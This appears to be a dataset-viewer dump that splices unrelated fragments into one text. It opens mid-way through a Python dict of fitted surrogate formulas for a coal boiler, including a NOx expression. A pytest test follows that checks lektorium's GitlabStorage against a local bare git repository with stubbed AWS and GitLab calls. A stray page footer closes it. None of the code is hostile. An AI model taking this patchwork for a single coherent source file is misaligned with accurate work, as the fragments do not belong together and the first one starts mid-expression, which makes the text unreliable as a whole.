+0.000219719 * b.wall_temperature_waterwall[t, 4] \
-3.75494e-05 * b.wall_temperature_waterwall[t, 5] \
-0.000963424 * b.wall_temperature_waterwall[t, 6] \
-4.89079e-05 * b.wall_temperature_waterwall[t, 7] \
+0.000204467 * b.wall_temperature_waterwall[t, 8] \
-0.000143756 * b.wall_temperature_waterwall[t, 10] \
-0.000389332 * b.wall_temperature_waterwall[t, 11] \
-0.000338076 * b.wall_temperature_platen[t] \
+0.241386 * b.flowrate_coal_raw[t] \
+2.67141 * b.mf_H2O_coal_raw[t] \
+910.531 * b.SR[t] \
+115.082 * b.SR_lf[t] \
+0.00275081 * b.secondary_air_inlet.temperature[t] \
-0.10997 * b.ratio_PA2coal[t] \
-2.10237 * log(b.flowrate_coal_raw[t]) \
-535.077 * log(b.SR[t]) \
-36.5477 * log(b.SR_lf[t]) \
+90.074 * exp(b.SR[t]) \
-667.684 * exp(b.SR_lf[t]) \
-4.24234e-08 * b.wall_temperature_roof[t]**2 \
-0.00369243 * b.flowrate_coal_raw[t]**2 \
-317.41 * b.SR[t]**2 \
+865.673 * b.SR_lf[t]**2 \
+9.64582e-06 * b.flowrate_coal_raw[t]**3 \
-1.69795e-07 * b.wall_temperature_waterwall[t, 1]*b.wall_temperature_waterwall[t, 9] \
-2.65157e-07 * b.wall_temperature_waterwall[t, 2]*b.wall_temperature_waterwall[t, 5] \
+0.000163992 * b.wall_temperature_waterwall[t, 2]*b.SR[t] \
-2.36504e-07 * b.wall_temperature_waterwall[t, 4]*b.wall_temperature_waterwall[t, 8] \
+5.23042e-06 * b.wall_temperature_waterwall[t, 4]*b.flowrate_coal_raw[t] \
-0.000165057 * b.wall_temperature_waterwall[t, 4]*b.SR[t] \
+5.85872e-08 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_waterwall[t, 11] \
+4.41736e-06 * b.wall_temperature_waterwall[t, 5]*b.flowrate_coal_raw[t] \
+4.67193e-07 * b.wall_temperature_waterwall[t, 6]*b.wall_temperature_waterwall[t, 11] \
+7.09971e-06 * b.wall_temperature_waterwall[t, 6]*b.flowrate_coal_raw[t] \
+6.36398e-07 * b.wall_temperature_waterwall[t, 6]*b.secondary_air_inlet.temperature[t] \
-2.41267e-07 * b.wall_temperature_waterwall[t, 7]*b.wall_temperature_waterwall[t, 8] \
+6.65347e-06 * b.wall_temperature_waterwall[t, 7]*b.flowrate_coal_raw[t] \
+3.4501e-06 * b.wall_temperature_waterwall[t, 8]*b.flowrate_coal_raw[t] \
+2.60247e-06 * b.wall_temperature_waterwall[t, 9]*b.flowrate_coal_raw[t] \
+4.71651e-06 * b.wall_temperature_waterwall[t, 10]*b.flowrate_coal_raw[t] \
+1.7254e-05 * b.wall_temperature_platen[t]*b.flowrate_coal_raw[t] \
+2.48343e-06 * b.wall_temperature_roof[t]*b.flowrate_coal_raw[t] \
-0.0571714 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
+0.0921271 * b.flowrate_coal_raw[t]*b.SR[t] \
-0.233398 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
-6.86695e-05 * b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t] \
+0.000995532 * b.flowrate_coal_raw[t]*b.ratio_PA2coal[t] \
-0.58226 * b.mf_H2O_coal_raw[t]*b.SR[t] \
-0.00447073 * b.SR[t]*b.secondary_air_inlet.temperature[t] \
+0.000246125 * b.secondary_air_inlet.temperature[t]*b.ratio_PA2coal[t] \
-2.22952e-10 * (b.wall_temperature_platen[t]*b.flowrate_coal_raw[t])**2 \
+1.80036e-06 * (b.wall_temperature_platen[t]*b.mf_H2O_coal_raw[t])**2 \
-0.000659596 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
+0.00333862 * (b.flowrate_coal_raw[t]*b.SR_lf[t])**2 \
+1.22954e-09 * (b.flowrate_coal_raw[t]*b.secondary_air_inlet.temperature[t])**2))",
"NOx": "(-0.00436267 * b.wall_temperature_waterwall[t, 1] \
-0.0254073 * b.wall_temperature_waterwall[t, 2] \
+0.0510658 * b.wall_temperature_waterwall[t, 3] \
-0.0639424 * b.wall_temperature_waterwall[t, 4] \
-0.172523 * b.wall_temperature_waterwall[t, 5] \
-0.000482641 * b.wall_temperature_waterwall[t, 6] \
+0.355125 * b.wall_temperature_waterwall[t, 7] \
+0.00348034 * b.wall_temperature_waterwall[t, 8] \
-0.97655 * b.wall_temperature_waterwall[t, 9] \
+1.31514 * b.wall_temperature_waterwall[t, 10] \
+0.0262232 * b.wall_temperature_waterwall[t, 11] \
-0.169549 * b.wall_temperature_waterwall[t, 12] \
-0.000935994 * b.wall_temperature_platen[t] \
-0.187802 * b.wall_temperature_roof[t] \
-285.589 * b.flowrate_coal_raw[t] \
+3715.18 * b.mf_H2O_coal_raw[t] \
+4412.39 * b.SR[t] \
+3191.45 * b.SR_lf[t] \
-2.80808 * b.secondary_air_inlet.temperature[t] \
-29.6263 * b.ratio_PA2coal[t] \
-8.19895 * log(b.wall_temperature_waterwall[t, 7]) \
-632.752 * log(b.wall_temperature_waterwall[t, 10]) \
-154.422 * log(b.flowrate_coal_raw[t]) \
-286.045 * log(b.SR[t]) \
+2.8111 * b.flowrate_coal_raw[t]**2 \
-2.51074e-07 * b.wall_temperature_waterwall[t, 10]**3 \
+1290.32 * b.SR_lf[t]**3 \
+7.41824e-05 * b.wall_temperature_waterwall[t, 3]*b.wall_temperature_waterwall[t, 4] \
+0.00014509 * b.wall_temperature_waterwall[t, 3]*b.wall_temperature_waterwall[t, 12] \
+0.000150378 * b.wall_temperature_waterwall[t, 5]*b.wall_temperature_roof[t] \
+0.0248537 * b.wall_temperature_waterwall[t, 5]*b.ratio_PA2coal[t] \
-0.353374 * b.wall_temperature_waterwall[t, 7]*b.SR_lf[t] \
+1.00281 * b.wall_temperature_waterwall[t, 9]*b.SR_lf[t] \
-1.81866e-05 * b.wall_temperature_waterwall[t, 10]*b.wall_temperature_waterwall[t, 12] \
-0.279407 * b.wall_temperature_waterwall[t, 10]*b.mf_H2O_coal_raw[t] \
+0.000775333 * b.wall_temperature_waterwall[t, 11]*b.flowrate_coal_raw[t] \
-0.415888 * b.wall_temperature_waterwall[t, 11]*b.mf_H2O_coal_raw[t] \
+0.0836883 * b.wall_temperature_waterwall[t, 12]*b.SR_lf[t] \
+0.0307674 * b.wall_temperature_roof[t]*b.ratio_PA2coal[t] \
-16.1433 * b.flowrate_coal_raw[t]*b.mf_H2O_coal_raw[t] \
+13.5804 * b.flowrate_coal_raw[t]*b.SR[t] \
+287.31 * b.flowrate_coal_raw[t]*b.SR_lf[t] \
-3021.62 * b.mf_H2O_coal_raw[t]*b.SR_lf[t] \
-4546.15 * b.SR[t]*b.SR_lf[t] \
+2.61054 * b.SR_lf[t]*b.secondary_air_inlet.temperature[t] \
-0.000160638 * (b.wall_temperature_waterwall[t, 3]*b.SR_lf[t])**2 \
-0.161015 * (b.flowrate_coal_raw[t]*b.SR[t])**2 \
-2.63321 * (b.flowrate_coal_raw[t]*b.SR_lf[t])**2)",
}
|
import subprocess
from unittest import mock
import pytest
from lektorium.repo.local.storage import AWS, GitLab, GitlabStorage, GitStorage
@pytest.mark.asyncio
async def test_gitlabstorage(tmpdir):
    """Exercise GitlabStorage against a local bare git repository.

    AWS, GitLab and GitStorage interactions are all stubbed out, so only
    the GitlabStorage glue is verified: repo-URL parsing, the files it
    drops into the working tree, and the options dict it assembles.
    """
    # A bare "remote" repository plus a clone acting as the working copy.
    remote_path = tmpdir / 'remote'
    workdir = tmpdir / 'local'
    for path in (remote_path, workdir):
        path.mkdir()
    subprocess.check_call('git init --bare .', shell=True, cwd=remote_path)
    subprocess.check_call(f'git clone {remote_path} .', shell=True, cwd=workdir)

    # Async stubs for the coroutine methods being patched out.
    async def fake_init_project(*args, **kwargs):
        return 'site_repo'

    async def fake_create_site(*args, **kwargs):
        return workdir, {}

    aws_stubs = dict(
        create_s3_bucket=lambda *args, **kwargs: 'bucket_name',
        create_cloudfront_distribution=lambda *args, **kwargs: ('dist_id', 'domain_name'),
        open_bucket_access=lambda *args, **kwargs: None,
    )
    with mock.patch.multiple(AWS, **aws_stubs), \
            mock.patch.multiple(GitLab, init_project=fake_init_project), \
            mock.patch.multiple(
                GitStorage,
                __init__=lambda *args, **kwargs: None,
                create_site=fake_create_site,
            ):
        storage = GitlabStorage(
            'git@server.domain:namespace/reponame.git',
            'token',
            'protocol',
        )
        # URL parsing: host and namespace extracted from the git remote URL.
        assert storage.repo == 'server.domain'
        assert storage.namespace == 'namespace'
        site_workdir, options = await storage.create_site(None, 'foo', '', 'bar')
        # create_site must have written the CI config and lektor project file.
        assert (workdir / '.gitlab-ci.yml').exists()
        assert (workdir / 'foo.lektorproject').exists()
        assert site_workdir == workdir
        assert options == {
            'cloudfront_domain_name': 'domain_name',
            'url': 'https://domain_name',
        }
        # Repo creation is delegated to the (stubbed) GitLab.init_project.
        assert await storage.create_site_repo('') == 'site_repo'
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.